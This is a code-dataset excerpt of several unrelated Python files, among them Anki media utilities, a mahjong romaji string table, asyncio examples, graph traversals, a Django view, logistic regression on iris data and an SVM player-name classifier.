else:\n os.unlink(path)\n unusedFileCount += 1\n deck.updateProgress(_(\"Delete stale references...\"))\n for (fname, id) in mediaIds.items():\n # maybe delete from db\n if id:\n deck.s.statement(\"delete from media where id = :id\", id=id)\n deck.s.statement(\"\"\"\ninsert into mediaDeleted (mediaId, deletedTime)\nvalues (:id, strftime('%s', 'now'))\"\"\", id=id)\n # update deck and save\n deck.flushMod()\n deck.save()\n deck.finishProgress()\n return missingFileCount, unusedFileCount - len(renamedFiles)\n\n# Download missing\n##########################################################################\n\ndef downloadMissing(deck):\n from anki.latex import renderLatex\n urls = dict(\n deck.s.all(\"select id, features from models where features != ''\"))\n if not urls:\n return None\n mdir = deck.mediaDir(create=True)\n os.chdir(mdir)\n deck.startProgress()\n missing = {}\n for (id, fid, val, mid) in deck.s.all(\"\"\"\nselect fields.id, factId, value, modelId from fields, facts\nwhere facts.id = fields.factId\"\"\"):\n # add latex tags\n val = 
renderLatex(deck, val, False)\n for (full, fname, repl) in mediaRefs(val):\n if not os.path.exists(os.path.join(mdir, fname)) and mid in urls:\n missing[fname] = mid\n success = 0\n for c, file in enumerate(missing.keys()):\n deck.updateProgress(label=_(\"Downloading %(a)d of %(b)d...\") % {\n 'a': c,\n 'b': len(missing),\n })\n try:\n data = urllib2.urlopen(urls[missing[file]] + file).read()\n open(file, \"wb\").write(data)\n success += 1\n except:\n pass\n deck.finishProgress()\n return len(missing), success\n\n# Export original files\n##########################################################################\n\ndef exportOriginalFiles(deck):\n deck.startProgress()\n origDir = deck.mediaDir(create=True)\n newDir = origDir.replace(\".media\", \".originals\")\n try:\n os.mkdir(newDir)\n except (IOError, OSError):\n pass\n cnt = 0\n for row in deck.s.all(\"select filename, originalPath from media\"):\n (fname, path) = row\n base = os.path.basename(path)\n if base == fname:\n continue\n cnt += 1\n deck.updateProgress(label=\"Exporting %s\" % base)\n old = os.path.join(origDir, fname)\n new = os.path.join(newDir, base)\n if os.path.exists(new):\n new = re.sub(\"(.*)(\\..*?)$\", \"\\\\1-%s\\\\2\" %\n os.path.splitext(fname)[0], new)\n shutil.copy2(old, new)\n deck.finishProgress()\n return cnt\n","repo_name":"zw/libanki","sub_path":"anki/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17860676548","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python3\n#python 3.7.2 3.7.3\n\n\"\"\"\ntranslated by Hu Xiangyou on February 22, 2019\ntranslated by Hu Xiangyou on June 6, 2019\n\"\"\"\ntitle=\"Maajang Keisanki\"\n\nask_input_tehai=\"Tehai o nyuuryoku\"\nhelp=\"README.md o goran kudasai\"\nlanguage_switched=\"Gengo wa Rooma-ji ni henkou-saremashita\"\nhas_0=\"「0」 fukumi. 「5」 to shimashita\"\nhas_0m=\"「0m」 fukumi. 「5m」 to shimashita\"\nhas_0p=\"「0p」 fukumi. 「5p」 to shimashita\"\nhas_0s=\"「0s」 fukumi. 「5s」 to shimashita\"\nhas_invalid_input=\"Mukou na nyuuryoku\"\nlow_speed=\"Tehai ga oo-sugi. Zokkou-shite mo yoroshii desu ka? 
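`downloadMissing` above fetches absent media over Python 2's `urllib2` and silently counts failures. On Python 3 the equivalent entry point is `urllib.request`; a hedged sketch of just that download loop (the URL base and filename list are stand-ins for the deck's model URLs):

```python
import urllib.request

def download_missing(url_base, filenames):
    """Fetch each listed file into the cwd; return the success count."""
    success = 0
    for fname in filenames:
        try:
            data = urllib.request.urlopen(url_base + fname).read()
            with open(fname, "wb") as f:
                f.write(data)
            success += 1
        except OSError:
            # the original deliberately swallows download errors as well
            pass
    return success
```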
(Chokusetsu Entaa-kii o oshite zokkou-shimasu)\"\n\nyakuman_level_list=('','yakuman','daburu-yakuman','toripuru-yakuman','yonbai-yakuman','gobaiya-kuman','rokubai-yakuman','nanabai-yakuman')\nkazoeyakuman='kazoeyakuman'\ntehai=\"tehai\"\nmore_than_4=\"{} wa 4-mai ijou\"\nmore_than_14=\"{}-mai no tehai wa 14-mai ijou\"\nless_than_13=\"{}-mai no tehai wa 13-mai ika (fuuro ari kamo)\"\ntaapai_or_shaopai=\"{} mai no tehai wa taapai mata wa shoopai\"\ndora='dora'\n\nkokushimusoujuusanmen='kokushimusoujuusanmen'\nkokushimusou='kokushimusou'\nchiitoitsu='chiitoitsu'\ntanyaochuu='tanyaochuu'\nyakuhai_ton='ton'\nyakuhai_nan='nan'\nyakuhai_shaa='shaa'\nyakuhai_pei='pei'\nyakuhai_haku='haku'\nyakuhai_hatsu='hatsu'\nyakuhai_chun='chun'\npinfu='pinfu'\niipeekoo='iipeekoo'\nrinshankaihou='rinshankaihou'\nsanshokudoujun='sanshokudoujun'\nikkitsuukan='ikkitsuukan'\nhonchantaiyaochuu='honchantaiyaochuu'\ntoitoihoo='toitoihoo'\nsanankoo='sanankoo'\nhonroutou='honroutou'\nsanshokudookoo='sanshokudookoo'\nshousangen='shousangen'\nhoniisoo='honiisoo'\njunchantaiyaochuu='junchantaiyaochuu'\nryanpeekoo='ryanpeekoo'\nchiniisoo='chiniisoo'\nsuuankootanki='suuankootanki'\nsuuankoo='suuankoo'\ndaisangen='daisangen'\ntsuuiisoo='tsuuiisoo'\nshousuushii='shousuushii'\nryuuiisoo='ryuuiisoo'\nchinroutou='chinroutou'\njunseichuurenpouton='junseichuurenpouton'\nchuurenpouton='chuurenpouton'\ndaisuushii='daisuushii'\nsankantsu='sankantsu'\nsuukantsu='suukantsu'\nbeginning_of_the_cosmos='beginning of the cosmos'\n\nhoora=\"Hoora\"\nfuu=\" fuu \"\nhan=\" han\"\nten=\" ten\"\nnot_hoora=\"Agaranai\"\nda=\"da\"\nkaraten=\"karaten\"\ntenpai=\"tenpai \"\nnooten=\"Nooten\"\n\ncolon=\": \"\nideographic_comma=\", \"\nquestion_mark=\"(?)\"\ntime_spent=\"Keisan wa {}-byou p kakarimashita\"\n\nhas_koyaku=\"Koyaku o yuukou ni shimashita\"\nnot_has_koyaku=\"Koyaku o mukou ni shimashita\"\nkoyaku=\"koyaku\"\nuumensai=\"uumensai\"\nsanrenkoo=\"sanrenkoo\"\nisshokusanjun=\"isshokusanjun\"\ndaisharin=\"daisharin\"\ndaichikurin=\"daichikurin\"\ndaisuurin=\"daisuurin\"\ndaichisei=\"daichisei\"\n\nok=\"Kakunin\"\nclear=\"Torinozoku\"\n","repo_name":"huxiangyou/mahjong-hoora","sub_path":"lang/romaji.py","file_name":"romaji.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"19961120007","text":"import asyncio\nimport time\nfrom typing import List\n\n\ndef fibonacci(i: int) -> int:\n\n if i == 0:\n return 0\n if i == 1:\n return 1\n\n return fibonacci(i - 1) + fibonacci(i - 2)\n\n\nasync def fibonacci_async(number: int):\n ioloop = asyncio.get_event_loop()\n res = await ioloop.run_in_executor(None, fibonacci, number)\n return res\n\n\nasync def long_operation() -> None:\n print('Start long operation')\n await asyncio.sleep(1)\n print('End long operation')\n\n\nasync def start_without_waiting() -> None:\n print('Start main')\n ioloop = asyncio.get_event_loop()\n task = ioloop.create_task(long_operation())\n # asyncio.sleep(1)\n # asyncio.run(long_operation())\n # ioloop.close()\n print('End main')\n\n\nasync def main():\n # asyncio.run(start_without_waiting())\n start = time.time()\n res = await calc_list_of_fibonacci([37, 34, 35])\n\n # asyncio.run(calc_list_of_fibonacci([37, 34, 35]))\n\n # res = [fibonacci(number) for number in [37, 34, 35]]\n print(res)\n\n print(f'time = {time.time() - start}')\n\n\nasync def calc_list_of_fibonacci(numbers: List[int]):\n ioloop = asyncio.get_event_loop()\n tasks = [fibonacci_async(i) for i in numbers]\n res 
= await asyncio.gather(*tasks)\n print(res)\n\n\nif __name__ == '__main__':\n asyncio.run(main())","repo_name":"mvereshchagin/MO2Asyncio","sub_path":"using_asyncio.py","file_name":"using_asyncio.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20043428719","text":"# urs/bin/python\r\n# encoding:utf-8\r\n\r\nimport os,time\r\nimport unittest\r\nimport configparser as cparser\r\nfrom testcase.v722.easycase.login import Login\r\nfrom testcase.v722.easycase.send import Send\r\nfrom base.baseAdb import BaseAdb\r\nfrom psam.psam import Psam\r\nfrom mail.mailOperation import EmailOperation\r\n\r\nPATH = lambda p:os.path.abspath(\r\n os.path.join(os.path.dirname(__file__),p)\r\n )\r\n\r\n\r\n# ======== Reading user_db.ini setting ===========\r\nbase_dir = str((os.path.dirname(__file__)))\r\nbase_dir = base_dir.replace('\\\\', '/')\r\nfile_path = base_dir + \"/user_db.ini\"\r\n\r\ncf = cparser.ConfigParser()\r\ncf.read(file_path)\r\n\r\nusername = cf.get(\"userconf\", \"user1\")\r\npwd = cf.get(\"userconf\", \"pwd1\")\r\n\r\n##====================\r\n\r\nclass PeakValue(unittest.TestCase):\r\n \r\n def setUp(self): \r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.moveForlder([\"100\",\"INBOX\"])\r\n \r\n BaseAdb.adbIntallUiautmator()\r\n \r\n self.driver = Psam()\r\n \r\n #释放实例,释放资源\r\n def tearDown(self):\r\n self.driver.quit()\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.moveForlder([\"INBOX\",\"100\"])\r\n\r\n def testCase(self):\r\n \r\n network = BaseAdb.getNetworkType()\r\n print('当前网络状态:%s' %network)\r\n \r\n runtimes = 2\r\n \r\n for x in range(1,runtimes):\r\n time.sleep(5)\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.checkInbox()\r\n time.sleep(5)\r\n print('当前运行次数为:%r' %(str(x)))\r\n\r\n try:\r\n stat = u'开始登录' \r\n login=Login(self.driver,username, pwd)\r\n login.loginActionPeakValue()\r\n \r\n stat = u'发送邮件' \r\n send = Send(self.driver,username+'@139.com')\r\n send.sendActionPeakValue()\r\n \r\n time.sleep(5)\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.clearForlder([u'已删除',u'已发送']) \r\n time.sleep(5) \r\n except BaseException as be:\r\n print(\"运行到:%s 运行出错,当次数据不入数据库!\" %stat)\r\n print(be)\r\n\r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n suite = unittest.TestSuite()\r\n suite.addTest(PeakValue('testCase'))\r\n runner = unittest.TextTestRunner(verbosity=2)\r\n runner.run(suite)","repo_name":"hi-cbh/pytest","sub_path":"src/testcase/v722/peakValue.py","file_name":"peakValue.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10750022097","text":"from solutions.ch14.Graph import Graph\nfrom solutions.ch6.ArrayQueue import ArrayQueue\n\nfrom collections import OrderedDict\n\ndef dfs(g, u, discovered):\n \"\"\"\n Perform DFS of the undiscovered portion of Graph g starting at Vertex u.\n discovered is an ordered dictionary mapping each vertex to the edge that was used to\n discover it during the DFS. 
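The asyncio record above pushes the recursive `fibonacci` onto `run_in_executor(None, ...)`, i.e. the default *thread* pool — under the GIL the three CPU-bound calls still run one at a time. Handing the loop a `ProcessPoolExecutor` actually parallelizes them; a sketch under that assumption:

```python
import asyncio
from concurrent.futures import ProcessPoolExecutor

def fibonacci(i: int) -> int:
    return i if i < 2 else fibonacci(i - 1) + fibonacci(i - 2)

async def main() -> None:
    loop = asyncio.get_running_loop()
    with ProcessPoolExecutor() as pool:
        # each number runs in its own worker process, not just its own thread
        results = await asyncio.gather(
            *(loop.run_in_executor(pool, fibonacci, n) for n in (37, 34, 35)))
    print(results)

if __name__ == '__main__':
    asyncio.run(main())
```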
(u should be \"discovered\" prior to the call.)\n    Newly discovered vertices will be added to the dictionary as a result.\n\n    Returns last discovered vertex\n    \"\"\"\n    for e in g.incident_edges(u):\n        v = e.opposite(u)\n        if v not in discovered:\n            discovered[v] = e\n            dfs(g, v, discovered)\n    return list(discovered.keys())[-1]\n\ndef bfs(g, u, discovered):\n    \"\"\"\n    Perform BFS of the undiscovered portion of Graph g starting at Vertex u.\n    discovered is a dictionary mapping each vertex to the edge that was used to\n    discover it during the BFS (u should be mapped to None prior to the call).\n    Newly discovered vertices will be added to the dictionary as a result.\n\n    Returns last discovered vertex\n    \"\"\"\n    q = ArrayQueue()\n    q.enqueue(u)\n\n    while not q.is_empty():\n        u = q.dequeue()\n        for e in g.incident_edges(u):\n            v = e.opposite(u)\n            if v not in discovered:\n                discovered[v] = e\n                q.enqueue(v)\n    return list(discovered.keys())[-1]\n\n\ndef construct_path(u, discovered):\n    path = [u]\n    while discovered[u] is not None:\n        path.append(discovered[u].opposite(u))\n        u = discovered[u].opposite(u)\n    return path\n\nif __name__ == \"__main__\":\n    g = Graph()\n    a = g.insert_vertex(\"A\")\n    b = g.insert_vertex(\"B\")\n    c = g.insert_vertex(\"C\")\n    d = g.insert_vertex(\"D\")\n    e = g.insert_vertex(\"E\")\n    f = g.insert_vertex(\"F\")\n\n    g.insert_edge(a, b)\n    g.insert_edge(b, c)\n    g.insert_edge(b, d)\n    g.insert_edge(b, e)\n    g.insert_edge(d, a)\n    g.insert_edge(e, f)\n    g.insert_edge(f, c)\n\n    discovered = OrderedDict([(a, None)])\n    last = dfs(g, a, discovered)\n    print(last)\n    print(construct_path(e, discovered))\n\n    discovered = OrderedDict([(a, None)])\n    last = bfs(g, a, discovered)\n    print(last)\n    print(construct_path(e, discovered))","repo_name":"itma96/Data-Structures-And-Algorithms-In-Python","sub_path":"solutions/ch14/traversals.py","file_name":"traversals.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74553734311","text":"\"\"\"create t1 table\n\nRevision ID: 9d08b9ea5451\nRevises:\nCreate Date: 2022-04-28 15:04:21.847475\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9d08b9ea5451'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.create_table(\n        't1',\n        sa.Column('pk', sa.Integer, primary_key=True, nullable=False),\n        sa.Column('v', sa.Integer),\n        sa.Column('d', sa.String),\n    )\n\n\ndef downgrade():\n    op.drop_table('t1')\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"python-orm-databases/sqlalchemy-alembic/p01_basic/alembic/versions/9d08b9ea5451_create_t1_table.py","file_name":"9d08b9ea5451_create_t1_table.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"818127749","text":"class Solution:\n    def search(self, nums: List[int], target: int) -> int:\n\n        pivot = nums[0]\n        if target == pivot:\n            return 0\n\n        left = 0\n        right = len(nums) - 1\n\n        while left <= right:\n            mid = (left + right) // 2\n\n            if nums[mid] == target:\n                return mid\n\n            logic = (target >= nums[mid]) ^ (nums[mid] >= pivot) ^ (pivot >= target)\n            if logic:\n                right = mid - 1\n            else:\n                left = mid + 1\n\n        return 
-1","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"searchInRotaedArray.py","file_name":"searchInRotaedArray.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38702306970","text":"import openpyxl\nimport re\n\ndef extract_channels_from_xlsx(filename):\n channels = set()\n wb = openpyxl.load_workbook(filename)\n ws = wb.active\n for row in ws.iter_rows(values_only=True):\n for cell in row:\n if isinstance(cell, str):\n matches = re.findall(r'(?:@|https?://t\\.me/|https?://telegram\\.me/)(\\w+)', cell)\n # print(\"Cell:\", cell)\n # print(\"Matches:\", matches)\n channels.update(matches)\n return channels\n\ndef save_channels_to_file(channels, output_file):\n with open(output_file, 'w') as file:\n file.write('\\n'.join(channels))\n\n\nchannels_file = '../data/channels.xlsx'\noutput_file = '../data/channels.txt'\n\nextracted_channels = extract_channels_from_xlsx(channels_file)\nsave_channels_to_file(extracted_channels, output_file)\n","repo_name":"ali-salloum6/who-said-innopolis-server","sub_path":"utils/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41756339192","text":"from net import Net\nimport torch\n\n\ndef test(model_name, loader): \n net = Net()\n net.load_state_dict(torch.load(\"./\"+model_name))\n dataiter = iter(loader)\n images, labels = dataiter.next()\n #to be able to count the acc\n correct = 0\n total = 0 \n\n with torch.no_grad(): #no gradients cuz' it's not training\n for data in loader:\n images, labels = data\n outputs = net(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n print(\"Accuracy: %d %%\" % (100 * correct / total))\n\n \n \n \n \n","repo_name":"moxi43/mnist_torch","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2832908248","text":"from django.shortcuts import render\nfrom api.forms import MainForm,OtherForm\nfrom api.models import Main,OtherField\nfrom pymongo import MongoClient\nfrom Ostadkar_final.settings import HOST_NAME,DATABASE_NAME\nfrom .serializers import MainSerializer as ms\nimport json\n\n\ndef main(request):\n mform = MainForm()\n oform = OtherForm()\n if request.method == 'POST':\n mform = MainForm(request.POST)\n oform = OtherForm(request.POST)\n oobj = OtherField()\n mobj = Main()\n mobj.sender = mform['sender'].value()\n mobj.datetime = mform['datetime'].value()\n mobj.priority = mform['priority'].value()\n mobj.description = mform['description'].value()\n oobj.other = oform['other'].value()\n\n\n print(mobj.other_fk_id)\n if mform.is_valid() and oform.is_valid():\n # Connection\n myclient = MongoClient(HOST_NAME)\n mydb = myclient[DATABASE_NAME]\n maincol = mydb[\"api_test\"]\n mainjson = ms(mobj)\n\n\n if oobj.other:\n try :\n jsonfile = json.loads(oobj.other)\n # maincol.insert_one(mainjson)\n\n mainjson['other'] = jsonfile\n maincol.insert(mainjson)\n except:\n mainjson[\"other\"] = oobj.other\n maincol.insert(mainjson)\n print(\"Could not load json\")\n else:\n maincol.insert(mainjson)\n\n return render(request,'api/main.html', 
context={'form1':mform,'form2':oform})\n\n\n\n","repo_name":"pedrampd/Ostadkar_final","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72292322472","text":"import os\nfrom pathlib import Path\nfrom typing import Optional\n\nimport pyheif\nfrom PIL import Image\n\n\ndef read_heic_image(input_filename: str) -> Image.Image:\n heif_file = pyheif.read(input_filename)\n image = Image.frombytes(\n heif_file.mode,\n heif_file.size,\n heif_file.data,\n \"raw\",\n heif_file.mode,\n heif_file.stride,\n )\n return image\n\n\ndef read_image(input_filename: str) -> Optional[Image.Image]:\n filename = Path(input_filename).name\n if not os.path.isfile(path=input_filename):\n return None\n\n filename_split = filename.split(\".\")\n if len(filename_split) != 2:\n print(f\"Ignoring {input_filename} because it has no extension.\")\n return None\n\n filename_extension = filename.split(\".\")[1].lower()\n if filename_extension in (\"mov\", \"mp4\"):\n print(f\"Ignoring {input_filename} because it is a video.\")\n return None\n # maybe it's an image at this point\n if filename_extension == \"heic\":\n return read_heic_image(input_filename=input_filename)\n else:\n try:\n image = Image.open(input_filename)\n return image\n except Exception:\n print(f\"Ignoring {input_filename} because it cannot be opened.\")\n","repo_name":"tianle91/image-deduplication","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15184572999","text":"def solve():\r\n N, A, B = map(int, input().split())\r\n h = []\r\n for _ in range(N):\r\n h.append(int(input()))\r\n ans_min = 0\r\n ans_max = 10 ** 9\r\n while ans_min + 1 < ans_max:\r\n ans = (ans_min + ans_max) // 2\r\n count = 0\r\n for i in h:\r\n count += (max(0, i - B * ans) + A - B - 1) // (A - B)\r\n if count > ans:\r\n ans_min = ans\r\n else:\r\n ans_max = ans\r\n print(ans_max)\r\n return\r\nsolve()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc075/B/4794775.py","file_name":"4794775.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"25568796226","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ndatas=open(\"./iris.csv\", \"r\", encoding=\"utf-8\")\r\ndatas=csv.reader(datas)\r\ni=0\r\ninfo=[]\r\ntarget_list=[]\r\nfor data in datas:\r\n if i==0:\r\n i=1\r\n continue\r\n if list(data)[-1] ==\"Setosa\":\r\n continue\r\n info.append(np.array([float(list(data)[1]), float(list(data)[2]), 1]))\r\n if list(data)[-1] == \"Versicolor\":\r\n target_list.append(0)\r\n elif list(data)[-1] == \"Virginica\":\r\n target_list.append(1)\r\n\r\n\r\nnum_iteration=200000\r\nlearning_rate=0.01\r\n\r\n\r\ntarget_list=np.array(target_list)\r\n\r\ninfo=np.array(info) #(100, 3)\r\ninfo=np.transpose(info) #(3, 100)\r\n\r\nplt.scatter(info[0][0:50], info[1][0:50], c=\"r\")\r\nplt.scatter(info[0][50:100], info[1][50:100], c=\"b\")\r\n\r\nsepal_width_mean=np.mean(info[0])\r\nsepal_width_std=np.std(info[0])\r\n\r\ninfo[0]= (info[0] - sepal_width_mean) / sepal_width_std\r\n\r\npetal_length_mean= np.mean(info[1])\r\npetal_length_std= np.std(info[1])\r\n\r\ninfo[1]= (info[1] - petal_length_mean) / petal_length_std\r\n\r\nw1, w2, w0= 0.1, 0.5, 1 
#0.1,0.5,1\r\n\r\nfor i in range(num_iteration):\r\n w=np.array([w1, w2, w0])\r\n\r\n predict=w @ info #(100, )\r\n predict_sigmoid= 1 / (1 + pow(np.e, -predict))\r\n\r\n loss= -(target_list * np.log(predict_sigmoid) + (1-target_list) * np.log(1-predict_sigmoid)) / len(info[0])\r\n\r\n if i==0:\r\n print(\"Before Training: \", abs(np.sum(loss)))\r\n\r\n w1 -= learning_rate * float(-(np.sum(info[0] * (target_list - predict_sigmoid)) / len(info[0])))\r\n w2 -= learning_rate * float(-(np.sum(info[1] * (target_list - predict_sigmoid)) / len(info[0])))\r\n w0 -= learning_rate * float(-(np.sum((target_list - predict_sigmoid)) / len(info[0])))\r\n\r\nprint(\"After Training: \", abs(np.sum(loss)))\r\n\r\nx1=np.linspace(2, 3.75, 100)\r\nx1_scailing = (x1 - sepal_width_mean) / sepal_width_std\r\nx2_scailing = -((w1*x1_scailing + w0) / w2)\r\nx2 = petal_length_std * x2_scailing + petal_length_mean\r\nplt.plot(x1, x2, c=\"g\")\r\n\r\nplt.show()\r\n","repo_name":"dokyung36d/machinelearning_uos","sub_path":"machinelearning_tasks_5.py","file_name":"machinelearning_tasks_5.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32436029974","text":"\n#\n# idades = [39, 30, 27, 18]\n#\n# print(type(idades))\n#\n# print(len(idades))\n#\n# idades.append(15)\n#\n# print(idades)\n#\n# for idade in idades:\n# print(idade)\n#\n# idades.remove(30)\n# print(idades)\n#\n# idades.insert(0,12)\n#\n# print(idades)\n#\n# # idades.clear()\n#\n# print(28 in idades)\n#\n# print(15 in idades)\n#\n# if 15 in idades:\n# idades.remove(15)\n#\n# idades.insert(0,20)\n#\n# print(idades)\n#\n# idades.extend([27,19])\n#\n# print(idades)\n#\n#\n#\n# idades_no_ano_que_vem = []\n#\n# for idade in idades:\n# idades_no_ano_que_vem.append(idade + 1)\n#\n# print(idades_no_ano_que_vem)\n#\n#\n# #list comprehension\n# idades_no_ano_que_vem = [(idade+1) for idade in idades]\n# print(idades_no_ano_que_vem)\n#\n# idade_maior_21 = [(idade) for idade in idades if idade > 21]\n# print(idade_maior_21)\n#\n# def faz_processamento_visualizacao(lista):\n# print(len(lista))\n#\n# faz_processamento_visualizacao(idades)\n\ndef faz_processamento_visualizacao(lista = None):\n if lista == None:\n lista = list()\n print(len(lista))\n print(lista)\n lista.append(13)\n\nfaz_processamento_visualizacao()\nfaz_processamento_visualizacao()\n\n\n\n\n\n","repo_name":"jean-script/Python-projetos","sub_path":"PycharmProjects/colecoes/introducao_collections.py","file_name":"introducao_collections.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29066686527","text":"import cv2\nimport numpy as np\n\nfrom ikalog.utils import matcher\n\n_TRUTH_2_SVM = {True: 1, False: -1}\n_SVM_2_ZEROONE = {-1: 0, 1: 1}\n\n\ndef normalize_player_name(img_name, debug=False):\n img_name_w_norm = np.zeros((15, 250), dtype=np.uint8)\n img_name_w = matcher.MM_WHITE(sat=(0, 96), visibility=(48, 255))(img_name)\n\n img_name_x_hist = np.extract(\n np.sum(img_name_w, axis=0) > 128,\n np.arange(img_name_w.shape[1]),\n )\n\n img_name_y_hist = np.extract(\n np.sum(img_name_w, axis=1) > 128,\n np.arange(img_name_w.shape[0]),\n )\n\n if (len(img_name_x_hist) == 0) or (len(img_name_y_hist) == 0):\n # In some cases, we can't find any pixels.\n return img_name_w_norm\n\n img_name_left = np.min(img_name_x_hist)\n img_name_right = np.max(img_name_x_hist)\n\n img_name_top = np.min(img_name_y_hist)\n 
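# The iris record above evaluates the sigmoid as 1 / (1 + e**-z) and then
# takes np.log of it, which can overflow or hit log(0) warnings once |z|
# grows during training. A numerically safer formulation of the same batch
# gradient update (a sketch on synthetic data; the variable names are not
# the record's):
import numpy as np


def stable_sigmoid(z: np.ndarray) -> np.ndarray:
    # Clipping bounds the exponent, so np.exp cannot overflow and the
    # output stays strictly inside (0, 1) for the log-loss below.
    return 1.0 / (1.0 + np.exp(-np.clip(z, -35.0, 35.0)))


def log_loss(y: np.ndarray, p: np.ndarray, eps: float = 1e-12) -> float:
    p = np.clip(p, eps, 1.0 - eps)
    return float(-np.mean(y * np.log(p) + (1.0 - y) * np.log(1.0 - p)))


if __name__ == '__main__':
    rng = np.random.default_rng(0)
    X = np.vstack([rng.normal(size=(2, 100)), np.ones((1, 100))])  # (3, n)
    y = (X[0] + X[1] > 0).astype(float)
    w = np.zeros(3)
    for _ in range(2000):
        p = stable_sigmoid(w @ X)
        w -= 0.1 * (X @ (p - y)) / y.size  # same gradient as in the record
    print('final loss:', log_loss(y, stable_sigmoid(w @ X)))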
img_name_bottom = np.max(img_name_y_hist)\n\n # Cropping error? should be handled gracefully.\n if not (img_name_left < img_name_right):\n return None\n\n if not (img_name_top < img_name_bottom):\n return None\n\n img_name_w = img_name_w[\n img_name_top:img_name_bottom, img_name_left:img_name_right]\n\n img_name_w_norm[:, 0: img_name_w.shape[1]] = cv2.resize(\n img_name_w, (img_name_w.shape[1], 15))\n\n if debug:\n print(img_name_w_norm.shape)\n cv2.imshow('name', img_name_w_norm)\n cv2.waitKey(1)\n\n return img_name_w_norm\n\n\ndef train_svm_classifiers(img_name_list, debug=False):\n \"\"\"\n Train player name classifier for specified img_name list.\n\n The images will be training with OpenCV Support Vector Machine functions.\n Returns list of SVM objects.\n\n The array would have \"None\" for the entry that SVM was not properly\n trained.\n \"\"\"\n assert isinstance(img_name_list, list)\n\n img_name_list = np.array(img_name_list, dtype=np.float32)\n\n X = np.array(\n list(map(lambda img: np.array(img).reshape((-1)), img_name_list)))\n\n # Train SVM per counter player.\n H = []\n for img in img_name_list:\n # y = Response for SVM Training. e.g. [1, -1, -1, -1]\n y = list(map(lambda e: _TRUTH_2_SVM[\n np.array_equal(e, img)], img_name_list))\n y = np.array(y, dtype=np.int)\n\n h = cv2.ml.SVM_create()\n h.setGamma(1)\n h.setC(1)\n h.setKernel(cv2.ml.SVM_LINEAR)\n h.setType(cv2.ml.SVM_C_SVC)\n\n h.train(X, cv2.ml.ROW_SAMPLE, y)\n\n # Test the model.\n r, predicted = h.predict(X)\n predicted_01 = None\n if r == 0:\n predicted_01 = map(lambda e: _SVM_2_ZEROONE[int(e)], predicted)\n predicted_01 = list(predicted_01)\n ok = (np.sum(predicted_01) == 1) and \\\n (np.argmax(y) == np.argmax(predicted_01))\n\n if not ok:\n h = None\n\n else:\n # SVM Classification failed.\n h = None\n\n H.append(h)\n\n print(H)\n import time\n time.sleep(3)\n return H\n\n\ndef predict(self, H_list, img_name):\n \"\"\"\n Predict the specified image.\n\n Returns index number, or None if it is not certain.\n \"\"\"\n\n features = np.array(img_name, dtype=np.float32).reshape((1, -1))\n\n matched = 0\n index = None\n\n for h in H_list:\n # Skip invalid hypothesises.\n if h is None:\n continue\n\n r, predicted = h.predict(features)\n if predicted[0] > 0:\n matched = matched + 1\n index = H_list.index(h)\n\n # If there are more than two or no matches, return None.\n if matched != 1:\n return None\n\n # If there is the exact match, return the index.\n return index\n\n\nclass PlayerNameClassifier(object):\n\n def __init__(self, img_name_list, debug=False):\n self._models = train_svm_classifiers(img_name_list, debug=debug)\n\n def predict(self, img_name, debug=False):\n \"\"\"\n Predict the specified image.\n\n Returns index number, or None if it is not certain.\n \"\"\"\n\n return predict(self, self._models, 